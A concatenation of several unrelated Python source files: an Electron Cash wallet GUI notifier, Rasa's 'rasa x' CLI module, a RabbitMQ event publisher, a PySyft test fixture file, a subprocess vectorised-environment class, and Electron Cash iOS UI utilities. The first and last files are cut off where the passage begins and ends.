verifs need to update the GUI.
- Checks the need_process_[v|n] flags
- If either flag is set, call the @rate_limited process_verifs
and/or process_notifs functions which update GUI parent in a
rate-limited (collated) fashion (for decent GUI responsiveness). '''
with self.lock:
bV, bN = self.need_process_v, self.need_process_n
self.need_process_v, self.need_process_n = False, False
if bV: self.process_verifs() # rate_limited call (1 per second)
if bN: self.process_notifs() # rate_limited call (1 per 15 seconds)
def verifs_get_and_clear(self):
''' Clears the verif_q. This is called from the network
thread for the 'verified2' event as well as from the below
update_verifs (GUI thread), hence the lock. '''
with self.lock:
ret = self.verif_q
self.verif_q = []
self.need_process_v = False
return ret
def notifs_get_and_clear(self):
with self.lock:
ret = self.notif_q
self.notif_q = []
self.need_process_n = False
return ret
def verif_add(self, args):
# args: [wallet, tx_hash, height, conf, timestamp]
# filter out tx's not for this wallet
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if args[0] is parent.wallet:
with self.lock:
self.verif_q.append(args[1:])
self.need_process_v = True
def notif_add(self, args):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
tx, wallet = args
# filter out tx's not for this wallet
if wallet is parent.wallet:
with self.lock:
self.notif_q.append(tx)
self.need_process_n = True
@rate_limited(1.0, ts_after=True)
def process_verifs(self):
''' Update history list with tx's from verifs_q, but limit the
GUI update rate to once per second. '''
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
items = self.verifs_get_and_clear()
if items:
parent.history_list.setUpdatesEnabled(False)
n_updates = 0
for item in items:
did_update = parent.history_list.update_item(*item)
n_updates += 1 if did_update else 0
self.print_error("Updated {}/{} verified txs in GUI"
.format(n_updates, len(items)))
parent.history_list.setUpdatesEnabled(True)
parent.update_status()
@rate_limited(5.0, classlevel=True)
def process_notifs(self):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if parent.network:
n_ok = 0
txns = self.notifs_get_and_clear()
if txns and parent.wallet.storage.get('gui_notify_tx', True):
# Combine the transactions
total_amount = 0
for tx in txns:
if tx:
is_relevant, is_mine, v, fee = parent.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
n_ok += 1
if total_amount > 0:
self.print_error("Notifying GUI %d tx"%(n_ok))
if n_ok > 1:
parent.notify(_("{} new transactions: {}")
.format(n_ok, parent.format_amount_and_units(total_amount, is_diff=True)))
else:
parent.notify(_("New transaction: {}").format(parent.format_amount_and_units(total_amount, is_diff=True)))
|
x.py
|
import argparse
import asyncio
import importlib.util
import logging
import os
import signal
import traceback
from multiprocessing import get_context
from typing import List, Text, Optional, Tuple, Union, Iterable
import aiohttp
import ruamel.yaml as yaml
import rasa.cli.utils as cli_utils
import rasa.utils.io as io_utils
from rasa.cli.arguments import x as arguments
from rasa.constants import (
DEFAULT_ENDPOINTS_PATH,
DEFAULT_CREDENTIALS_PATH,
DEFAULT_DOMAIN_PATH,
DEFAULT_CONFIG_PATH,
DEFAULT_LOG_LEVEL_RASA_X,
DEFAULT_RASA_X_PORT,
DEFAULT_RASA_PORT,
)
from rasa.core.utils import AvailableEndpoints
from rasa.utils.endpoints import EndpointConfig
logger = logging.getLogger(__name__)
DEFAULT_EVENTS_DB = "events.db"
# noinspection PyProtectedMember
def add_subparser(
subparsers: argparse._SubParsersAction, parents: List[argparse.ArgumentParser]
):
x_parser_args = {
"parents": parents,
"conflict_handler": "resolve",
"formatter_class": argparse.ArgumentDefaultsHelpFormatter,
}
if is_rasa_x_installed():
# we'll only show the help msg for the command if Rasa X is actually installed
x_parser_args["help"] = "Starts the Rasa X interface."
shell_parser = subparsers.add_parser("x", **x_parser_args)
shell_parser.set_defaults(func=rasa_x)
arguments.set_x_arguments(shell_parser)
def _rasa_service(
args: argparse.Namespace,
endpoints: AvailableEndpoints,
rasa_x_url: Optional[Text] = None,
credentials_path: Optional[Text] = None,
):
"""Starts the Rasa application."""
from rasa.core.run import serve_application
# needs separate logging configuration as it is started in its own process
logging.basicConfig(level=args.loglevel)
io_utils.configure_colored_logging(args.loglevel)
logging.getLogger("apscheduler").setLevel(logging.WARNING)
if not credentials_path:
credentials_path = _prepare_credentials_for_rasa_x(
args.credentials, rasa_x_url=rasa_x_url
)
serve_application(
endpoints=endpoints,
port=args.port,
credentials=credentials_path,
cors=args.cors,
auth_token=args.auth_token,
enable_api=True,
jwt_secret=args.jwt_secret,
jwt_method=args.jwt_method,
ssl_certificate=args.ssl_certificate,
ssl_keyfile=args.ssl_keyfile,
ssl_password=args.ssl_password,
)
def _prepare_credentials_for_rasa_x(
credentials_path: Optional[Text], rasa_x_url: Optional[Text] = None
) -> Text:
credentials_path = cli_utils.get_validated_path(
credentials_path, "credentials", DEFAULT_CREDENTIALS_PATH, True
)
if credentials_path:
credentials = io_utils.read_config_file(credentials_path)
else:
credentials = {}
# this makes sure the Rasa X is properly configured no matter what
if rasa_x_url:
credentials["rasa"] = {"url": rasa_x_url}
dumped_credentials = yaml.dump(credentials, default_flow_style=False)
tmp_credentials = io_utils.create_temporary_file(dumped_credentials, "yml")
return tmp_credentials
def _overwrite_endpoints_for_local_x(
endpoints: AvailableEndpoints, rasa_x_token: Text, rasa_x_url: Text
):
from rasa.utils.endpoints import EndpointConfig
import questionary
endpoints.model = EndpointConfig(
"{}/projects/default/models/tags/production".format(rasa_x_url),
token=rasa_x_token,
wait_time_between_pulls=2,
)
overwrite_existing_event_broker = False
if endpoints.event_broker and not _is_correct_event_broker(endpoints.event_broker):
cli_utils.print_error(
"Rasa X currently only supports a SQLite event broker with path '{}' "
"when running locally. You can deploy Rasa X with Docker "
"(https://rasa.com/docs/rasa-x/deploy/) if you want to use "
"other event broker configurations.".format(DEFAULT_EVENTS_DB)
)
overwrite_existing_event_broker = questionary.confirm(
"Do you want to continue with the default SQLite event broker?"
).ask()
if not overwrite_existing_event_broker:
exit(0)
if not endpoints.tracker_store or overwrite_existing_event_broker:
endpoints.event_broker = EndpointConfig(type="sql", db=DEFAULT_EVENTS_DB)
def _is_correct_event_broker(event_broker: EndpointConfig) -> bool:
return all(
[
event_broker.type == "sql",
event_broker.kwargs.get("dialect", "").lower() == "sqlite",
event_broker.kwargs.get("db") == DEFAULT_EVENTS_DB,
]
)
def start_rasa_for_local_rasa_x(args: argparse.Namespace, rasa_x_token: Text):
"""Starts the Rasa X API with Rasa as a background process."""
credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
endpoints = AvailableEndpoints.read_endpoints(endpoints_path)
rasa_x_url = "http://localhost:{}/api".format(args.rasa_x_port)
_overwrite_endpoints_for_local_x(endpoints, rasa_x_token, rasa_x_url)
vars(args).update(
dict(
nlu_model=None,
cors="*",
auth_token=args.auth_token,
enable_api=True,
endpoints=endpoints,
)
)
ctx = get_context("spawn")
p = ctx.Process(
target=_rasa_service, args=(args, endpoints, rasa_x_url, credentials_path)
)
p.daemon = True
p.start()
return p
def is_rasa_x_installed():
"""Check if Rasa X is installed."""
# we could also do something like checking if `import rasax` works,
# the issue with that is that it actually does import the package and this
# takes some time that we don't want to spend when booting the CLI
return importlib.util.find_spec("rasax") is not None
def generate_rasa_x_token(length: int = 16):
"""Generate a hexadecimal secret token used to access the Rasa X API.
A new token is generated on every `rasa x` command.
"""
from secrets import token_hex
return token_hex(length)
def _configure_logging(args: argparse.Namespace):
from rasa.core.utils import configure_file_logging
from rasa.utils.common import set_log_level
log_level = args.loglevel or DEFAULT_LOG_LEVEL_RASA_X
if isinstance(log_level, str):
log_level = logging.getLevelName(log_level)
logging.basicConfig(level=log_level)
io_utils.configure_colored_logging(args.loglevel)
set_log_level(log_level)
configure_file_logging(logging.root, args.log_file)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
logging.getLogger("engineio").setLevel(logging.WARNING)
logging.getLogger("pika").setLevel(logging.WARNING)
logging.getLogger("socketio").setLevel(logging.ERROR)
if not log_level == logging.DEBUG:
logging.getLogger().setLevel(logging.WARNING)
logging.getLogger("py.warnings").setLevel(logging.ERROR)
def is_rasa_project_setup(project_path: Text):
mandatory_files = [DEFAULT_CONFIG_PATH, DEFAULT_DOMAIN_PATH]
for f in mandatory_files:
if not os.path.exists(os.path.join(project_path, f)):
return False
return True
def _validate_rasa_x_start(args: argparse.Namespace, project_path: Text):
if not is_rasa_x_installed():
cli_utils.print_error_and_exit(
"Rasa X is not installed. The `rasa x` "
"command requires an installation of Rasa X. "
"Instructions on how to install Rasa X can be found here: "
"https://rasa.com/docs/rasa-x/installation-and-setup/."
)
if args.port == args.rasa_x_port:
cli_utils.print_error_and_exit(
"The port for Rasa X '{}' and the port of the Rasa server '{}' are the "
"same. We need two different ports, one to run Rasa X (e.g. delivering the "
"UI) and another one to run a normal Rasa server.\nPlease specify two "
"different ports using the arguments '--port' and '--rasa-x-port'.".format(
args.rasa_x_port, args.port
)
)
if not is_rasa_project_setup(project_path):
cli_utils.print_error_and_exit(
"This directory is not a valid Rasa project. Use 'rasa init' "
"to create a new Rasa project or switch to a valid Rasa project "
"directory (see http://rasa.com/docs/rasa/user-guide/"
"rasa-tutorial/#create-a-new-project)."
)
_validate_domain(os.path.join(project_path, DEFAULT_DOMAIN_PATH))
if args.data and not os.path.exists(args.data):
cli_utils.print_warning(
"The provided data path ('{}') does not exists. Rasa X will start "
"without any training data.".format(args.data)
)
def _validate_domain(domain_path: Text):
from rasa.core.domain import Domain, InvalidDomain
try:
Domain.load(domain_path)
except InvalidDomain as e:
cli_utils.print_error_and_exit(
"The provided domain file could not be loaded. " "Error: {}".format(e)
)
def rasa_x(args: argparse.Namespace):
from rasa.cli.utils import signal_handler
signal.signal(signal.SIGINT, signal_handler)
_configure_logging(args)
if args.production:
run_in_production(args)
else:
run_locally(args)
async def _pull_runtime_config_from_server(
config_endpoint: Optional[Text],
attempts: int = 60,
wait_time_between_pulls: Union[int, float] = 5,
keys: Iterable[Text] = ("endpoints", "credentials"),
) -> Optional[List[Text]]:
"""Pull runtime config from `config_endpoint`.
Returns a list of paths to yaml dumps, each containing the contents of one of
`keys`.
"""
while attempts:
try:
async with aiohttp.ClientSession() as session:
async with session.get(config_endpoint) as resp:
if resp.status == 200:
rjs = await resp.json()
try:
return [
io_utils.create_temporary_file(rjs[k]) for k in keys
]
except KeyError as e:
cli_utils.print_error_and_exit(
"Failed to find key '{}' in runtime config. "
"Exiting.".format(e)
)
else:
logger.debug(
"Failed to get a proper response from remote "
"server. Status Code: {}. Response: '{}'"
"".format(resp.status, await resp.text())
)
except aiohttp.ClientError as e:
logger.debug("Failed to connect to server. Retrying. {}".format(e))
await asyncio.sleep(wait_time_between_pulls)
attempts -= 1
cli_utils.print_error_and_exit(
"Could not fetch runtime config from server at '{}'. "
"Exiting.".format(config_endpoint)
)
def run_in_production(args: argparse.Namespace):
from rasa.cli.utils import print_success
print_success("Starting Rasa X in production mode... 🚀")
credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
endpoints = AvailableEndpoints.read_endpoints(endpoints_path)
_rasa_service(args, endpoints, None, credentials_path)
def _get_credentials_and_endpoints_paths(
args: argparse.Namespace
) -> Tuple[Optional[Text], Optional[Text]]:
config_endpoint = args.config_endpoint
if config_endpoint:
loop = asyncio.get_event_loop()
endpoints_config_path, credentials_path = loop.run_until_complete(
_pull_runtime_config_from_server(config_endpoint)
)
else:
endpoints_config_path = cli_utils.get_validated_path(
args.endpoints, "endpoints", DEFAULT_ENDPOINTS_PATH, True
)
credentials_path = None
return credentials_path, endpoints_config_path
def run_locally(args: argparse.Namespace):
# noinspection PyUnresolvedReferences
from rasax.community import local # pytype: disable=import-error
args.rasa_x_port = args.rasa_x_port or DEFAULT_RASA_X_PORT
args.port = args.port or DEFAULT_RASA_PORT
project_path = "."
_validate_rasa_x_start(args, project_path)
local.check_license_and_metrics(args)
rasa_x_token = generate_rasa_x_token()
process = start_rasa_for_local_rasa_x(args, rasa_x_token=rasa_x_token)
try:
local.main(args, project_path, args.data, token=rasa_x_token)
except Exception:
print (traceback.format_exc())
cli_utils.print_error(
"Sorry, something went wrong (see error above). Make sure to start "
"Rasa X with valid data and valid domain and config files. Please, "
"also check any warnings that popped up.\nIf you need help fixing "
"the issue visit our forum: https://forum.rasa.com/."
)
finally:
process.terminate()
|
observers.py
|
"""Classes for observers in ``emanate``."""
import logging
from threading import Thread
from six.moves import queue
from pika.exceptions import AMQPError, RecursionError
from pikachewie.data import Properties
from pikachewie.helpers import broker_from_config
from pikachewie.publisher import BlockingJSONPublisher
__metaclass__ = type
log = logging.getLogger(__name__)
class BasePublisher:
"""Base Publisher class."""
def __init__(self, *args, **kwargs):
pass
def publish(self, event):
pass
NullPublisher = BasePublisher
"""Publisher that silently discards all events."""
class QueuePublisher(BasePublisher):
"""Publisher that dispatches events to a `queue.Queue`."""
def __init__(self):
self._queue = queue.Queue(maxsize=256)
self._worker = Thread(target=self._process_queue)
self._worker.daemon = True
self._worker.start()
def publish(self, event):
try:
self._queue.put_nowait(event)
except queue.Full as exc:
log.exception('Cannot publish event: %r', exc)
log.warn('Failed to publish event %s with context %s',
event.data, event.context)
def _process_queue(self):
while True:
event = self._queue.get()
try:
self._process_event(event)
except Exception as exc:
log.exception(exc)
finally:
self._queue.task_done()
def _process_event(self, event):
pass
class RabbitMQPublisher(QueuePublisher):
"""Publisher that publishes events as messages to RabbitMQ.
By default, messages are published on a headers exchange. The name of the
exchange is given in the `config` passed to the Publisher's constructor.
"""
def __init__(self, config, broker_name='default'):
self.config = config
self.broker_name = broker_name
self.broker = broker_from_config(
self.config['rabbitmq']['brokers'][self.broker_name]
)
self.publisher = BlockingJSONPublisher(self.broker)
self.exchange = self.config['rabbitmq']['default_exchange']
self._initialize()
super(RabbitMQPublisher, self).__init__()
def _initialize(self):
# declare the exchange (will trigger a connection to the broker)
self.publisher.channel.exchange_declare(
self.exchange,
**self.config['rabbitmq']['exchanges'][self.exchange]
)
def _wait_for_event(self):
while True:
# trigger processing of RabbitMQ data events
try:
self.publisher.process_data_events()
except Exception as exc:
log.exception('Error processing data events: %r', exc)
del self.publisher.channel
try:
return self._queue.get(timeout=10)
except queue.Empty:
pass
def _process_queue(self):
while True:
event = self._wait_for_event()
self._handle_event(event)
def _handle_event(self, event):
try:
self._process_event(event)
except Exception as exc:
log.exception(exc)
finally:
self._queue.task_done()
def _process_event(self, event):
properties = Properties()
if event.context:
properties.headers = event.context
routing_key = properties.headers.get('routing_key', '')
try:
self.publisher.publish(self.exchange, routing_key, event.data, properties)
except (AMQPError, RecursionError) as exc:
log.exception('Cannot publish to RabbitMQ: %r', exc)
log.warn('Failed to publish message payload %s with context %s',
event.data, event.context)
|
conftest.py
|
import pytest
import torch
from multiprocessing import Process
import syft
from syft import TorchHook
@pytest.fixture()
def start_proc(): # pragma: no cover
""" helper function for spinning up a websocket participant """
def _start_proc(participant, kwargs):
def target():
server = participant(**kwargs)
server.start()
p = Process(target=target)
p.start()
return p
return _start_proc
@pytest.fixture(scope="session", autouse=True)
def hook():
hook = TorchHook(torch)
return hook
@pytest.fixture(scope="session", autouse=True)
def workers(hook):
# Define 3 virtual workers
alice = syft.VirtualWorker(id="alice", hook=hook, is_client_worker=False)
bob = syft.VirtualWorker(id="bob", hook=hook, is_client_worker=False)
james = syft.VirtualWorker(id="james", hook=hook, is_client_worker=False)
output = {"me": hook.local_worker, "alice": alice, "bob": bob, "james": james}
return output
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from . import VecEnv, CloudpickleWrapper
from baselines.common.tile_images import tile_images
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'render':
remote.send(env.render(mode='rgb_array'))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.viewer = None
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
if self.viewer is not None:
self.viewer.close()
self.closed = True
def render(self, mode='human'):
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
bigimg = tile_images(imgs)
if mode == 'human':
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(bigimg[:, :, ::-1])
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
|
utils.py
|
#!/usr/bin/env python3
#
# Electron Cash - lightweight Bitcoin Cash client
# Copyright (C) 2012 thomasv@gitorious
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, os, json, qrcode, qrcode.image.svg, tempfile, random, queue, threading, time, stat
from collections import namedtuple
from inspect import signature
from typing import Callable, Any
from .uikit_bindings import *
from .custom_objc import *
from electroncash.i18n import _
def is_2x_screen() -> bool:
return True if UIScreen.mainScreen.scale > 1.0 else False
def is_iphone() -> bool:
return bool(UI_USER_INTERFACE_IDIOM() == UIUserInterfaceIdiomPhone)
def is_iphone5() -> bool:
# iphone5 has 1136 pix height
return is_iphone() and ( abs(UIScreen.mainScreen.nativeBounds.size.height - 1136.0) < 0.5 )
def is_iphone4() -> bool:
# iphone4 has <1136 pix height
return is_iphone() and ( UIScreen.mainScreen.nativeBounds.size.height - 1136.0 < -0.5 )
def is_iphoneX() -> bool:
# iphone X has 2436 pix height
return is_iphone() and ( UIScreen.mainScreen.nativeBounds.size.height - 2436.0 < 0.5 )
def is_ipad() -> bool:
return not is_iphone()
def is_landscape() -> bool:
o = UIApplication.sharedApplication.statusBarOrientation
return bool(o in [UIInterfaceOrientationLandscapeLeft,UIInterfaceOrientationLandscapeRight])
def is_portrait() -> bool:
return not is_landscape()
def get_fn_and_ext(fileName: str) -> tuple:
*p1, ext = fileName.split('.')
fn=''
if len(p1) is 0:
fn = ext
ext = None
else:
fn = '.'.join(p1)
return (fn,ext)
def get_user_dir():
dfm = NSFileManager.defaultManager
# documents dir
thedir = dfm.URLsForDirectory_inDomains_(9, 1).objectAtIndex_(0)
return str(thedir.path)
def get_tmp_dir():
return str(ObjCInstance(uikit.NSTemporaryDirectory()))
def uiview_set_enabled(view : ObjCInstance, b : bool) -> None:
if view is None: return
view.userInteractionEnabled = bool(b)
view.alpha = float(1.0 if bool(b) else 0.3)
view.setNeedsDisplay()
def pathsafeify(s : str) -> str:
return s.translate({ord(i):None for i in ':/.\$#@[]}{*?'}).strip()
def cleanup_tmp_dir():
t0 = time.time()
d = get_tmp_dir()
ct = 0
tot = 0
import glob
if os.path.isdir(d):
it = glob.iglob(os.path.join(d,'*'))
for f in it:
tot += 1
try:
os.remove(f)
ct += 1
except:
pass
if tot:
NSLog("Cleaned up %d/%d files from tmp dir in %f ms",ct,tot,(time.time()-t0)*1e3)
def ios_version_string() -> str:
dev = UIDevice.currentDevice
return "%s %s %s (%s)"%(str(dev.systemName), str(dev.systemVersion), str(dev.model), str(dev.identifierForVendor))
# new color schem from Max
_ColorScheme = None
def uicolor_custom(name : str) -> ObjCInstance:
global _ColorScheme
name = name.strip().lower() if name else ""
if not _ColorScheme:
# initialize it on first call. We don't initialize it on initial module load to shave a few mss off app loading time.
_ColorScheme = {
'dark' : UIColor.colorInDeviceRGBWithHexString_("#414141").retain(),
'light' : UIColor.colorInDeviceRGBWithHexString_("#CCCCCC").retain(),
'ultralight': UIColor.colorInDeviceRGBWithHexString_("#F6F6F6").retain(),
'nav' : UIColor.colorInDeviceRGBWithHexString_("#558BFF").retain(),
'link' : UIColor.colorInDeviceRGBWithHexString_("#558BFF").retain(),
'linktapped': UIColor.colorInDeviceRGBWithHexString_("#FF8BFF").retain(),
'navtint' : UIColor.colorInDeviceRGBWithHexString_("#FFFFFF").retain(),
'red' : UIColor.colorInDeviceRGBWithHexString_("#FF6161").retain(),
'notif' : UIColor.colorInDeviceRGBWithHexString_("#BBFF3B").retain(), # very bright green
'green' : UIColor.colorInDeviceRGBWithHexString_("#9BDF1B").retain(), # less bright green
}
schemecolor = _ColorScheme.get(name, None)
if schemecolor:
return schemecolor
# other, old-style colors. These will be removed once we fully transition to new UI style
if name in ['blue', 'myblue', 'tf', 'password']:
return UIColor.colorWithRed_green_blue_alpha_(0.91746425629999995, 0.95870447160000005, 0.99979293349999998, 1.0)
if name in ['change', 'changeaddress', 'change address']:
return UIColor.colorWithRed_green_blue_alpha_(1.0,0.9,0.3,0.3)
if name in ['frozen', 'frozenaddress', 'frozen address']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,0.125)
if name in ['frozentext', 'frozen text', 'frozenaddresstext', 'frozen address text']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,1.0)
if name in ['frozentextbright', 'frozen text bright', 'frozenaddresstextbright', 'frozen address text bright']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.8,0.8,1.0)
if name in ['frozentextlight', 'frozen text light', 'frozenaddresstextlight', 'frozen address text light']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,0.4)
NSLog("uicolor_custom: UNKNOWN custom color '%s' -- returning GRAY -- FIXME"%(str(name)))
return UIColor.grayColor
def tintify(t : ObjCInstance) -> ObjCInstance:
# setup nav tint colors
t.navigationBar.setTranslucent_(False)
t.navigationBar.barTintColor = uicolor_custom('nav')
t.navigationBar.tintColor = uicolor_custom('navtint')
t.navigationBar.barStyle = UIBarStyleBlack
return t
def ats_replace_font(ats : NSAttributedString, font: UIFont) -> NSMutableAttributedString:
out = NSMutableAttributedString.alloc().initWithAttributedString_(ats)
r = NSRange(0, out.length())
out.removeAttribute_range_(NSFontAttributeName, r)
out.addAttribute_value_range_(NSFontAttributeName, font, r)
return out
def uitf_redo_attrs(tf : ObjCInstance) -> None:
weight = UIFontWeightMedium if tf.tag == 1 else UIFontWeightRegular
# TESTING ATTRIBUTED STRING STUFF..
# 1. Placeholder
ats = NSMutableAttributedString.alloc().initWithString_(tf.placeholder).autorelease()
r = NSRange(0,ats.length())
ats.addAttribute_value_range_(NSFontAttributeName, UIFont.italicSystemFontOfSize_(14.0), r)
ats.addAttribute_value_range_(NSForegroundColorAttributeName, uicolor_custom('light'), r)
ps = NSMutableParagraphStyle.new().autorelease()
ps.setParagraphStyle_(NSParagraphStyle.defaultParagraphStyle)
ps.lineBreakMode = NSLineBreakByTruncatingMiddle
indent = 10.0 if tf.isUserInteractionEnabled() else 0.0
ps.firstLineHeadIndent = indent
ps.tailIndent = -indent
ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
tf.attributedPlaceholder = ats
# 2. Actual text
ats = NSMutableAttributedString.alloc().initWithString_(tf.text)
r = NSRange(0,ats.length())
ats.addAttribute_value_range_(NSFontAttributeName, UIFont.systemFontOfSize_weight_(14.0, weight), r)
ats.addAttribute_value_range_(NSForegroundColorAttributeName, uicolor_custom('dark'), r)
ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
tf.attributedText = ats
# NB: This isn't normally called since you need to specify the full pathname of the resource you want, instead
# if you need images, call uiimage_get, etc. This does NOT search recursively, since NSBundle sucks.
def get_bundle_resource_path(fileName: str, directory: str = None) -> str:
fn,ext = get_fn_and_ext(fileName)
if directory is None:
return NSBundle.mainBundle.pathForResource_ofType_(fn, ext)
return NSBundle.mainBundle.pathForResource_ofType_inDirectory_(fn, ext, directory)
def nsattributedstring_from_html(html : str) -> ObjCInstance:
data = ns_from_py(html.encode('utf-8'))
return NSMutableAttributedString.alloc().initWithHTML_documentAttributes_(data,None).autorelease()
def uilabel_replace_attributed_text(lbl : ObjCInstance, text : str, template : ObjCInstance = None, font : ObjCInstance = None) -> ObjCInstance:
if not isinstance(template, NSAttributedString):
template = lbl.attributedText
if template is None:
template = NSAttrubutedString.new().autorelease()
astr = NSMutableAttributedString.alloc().initWithAttributedString_(template).autorelease()
astr.replaceCharactersInRange_withString_(NSRange(0,astr.length()), text)
if font:
r = NSRange(0,astr.length())
astr.removeAttribute_range_(NSFontAttributeName,r)
astr.addAttribute_value_range_(NSFontAttributeName,font,r)
lbl.attributedText = astr
return lbl
def nsurl_read_local_file(url : ObjCInstance, binary = False) -> tuple:
try:
cstring = NSMutableData.dataWithLength_(4096)
from ctypes import c_char_p
url.getFileSystemRepresentation_maxLength_(c_char_p(cstring.mutableBytes), 4096)
filename = py_from_ns(cstring)
nul = filename.find(b'\0')
if nul >= 0:
filename = filename[:nul]
filename = filename.decode('utf-8')
mode = "r"
if binary: mode = "rb"
with open(filename, mode) as f:
data = f.read()
#print("File data:\n",data)
return data, filename
except:
NSLog("nsurl_read_local_file got exception: %s",str(sys.exc_info[1]))
return None, None
_threading_original__init__ = None
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
global _threading_original__init__
if _threading_original__init__:
NSLog("*** ERROR: setup_thread_excepthook already called once in this app!")
return
_threading_original__init__ = threading.Thread.__init__
def MyInit(self, *args, **kwargs):
_threading_original__init__(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except ConnectionError:
NSLog("ConnectionError: %s",str(sys.exc_info()[1]))
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = MyInit
def cleanup_thread_excepthook():
global _threading_original__init__
if _threading_original__init__:
threading.Thread.__init__ = _threading_original__init__
_threading_original__init__ = None
###################################################
### Show Share ActionSheet
###################################################
def show_share_actions(vc : ObjCInstance,
fileName : str = None,
text : str = None,
url : NSURL = None,
img : UIImage = None,
excludedActivityTypes = None,
completion: Callable[[],None] = None, # optional completion function that gets called when alert is presented
ipadAnchor : object = None,
animated : bool = True,
finishedCompletion: Callable[[], str] = None, # optional completion function that gets called when alert is finished. the string passed is the UIActivityType the user selected, or None if the user cancelled the activity
objectName : str = None # the descriptive name of the object eg 'File' or 'Transaction' or 'Wallet', translated
) -> ObjCInstance:
objectName = _("File") if not objectName or not isinstance(objectName, str) else objectName
items = []
if fileName:
items.append(NSURL.fileURLWithPath_(fileName))
if isinstance(text, str):
items.append(ns_from_py(text))
if isinstance(url, NSURL):
items.append(url)
if isinstance(img, UIImage):
items.append(img)
avc = UIActivityViewController.alloc().initWithActivityItems_applicationActivities_(items, None).autorelease()
if excludedActivityTypes is None:
excludedActivityTypes = [
UIActivityTypePostToFacebook,
UIActivityTypePostToTwitter,
UIActivityTypePostToWeibo,
UIActivityTypeAssignToContact,
UIActivityTypeSaveToCameraRoll,
UIActivityTypeAddToReadingList,
UIActivityTypePostToFlickr,
UIActivityTypePostToVimeo,
UIActivityTypePostToTencentWeibo,
UIActivityTypeOpenInIBooks,
]
if isinstance(img, UIImage):
excludedActivityTypes.remove(UIActivityTypeSaveToCameraRoll)
avc.excludedActivityTypes = excludedActivityTypes
if is_ipad():
popover = avc.popoverPresentationController()
if isinstance(ipadAnchor, UIBarButtonItem):
popover.barButtonItem = ipadAnchor
else:
popover.sourceView = vc.view
if isinstance(ipadAnchor, CGRect):
rect = ipadAnchor
else:
rect = vc.view.frame
rect = CGRectMake(rect.size.width/2.0,rect.size.height/4.0,0.0,0.0)
popover.sourceRect = rect
def onCompletion() -> None:
if completion is not None:
#print("Calling completion callback..")
completion()
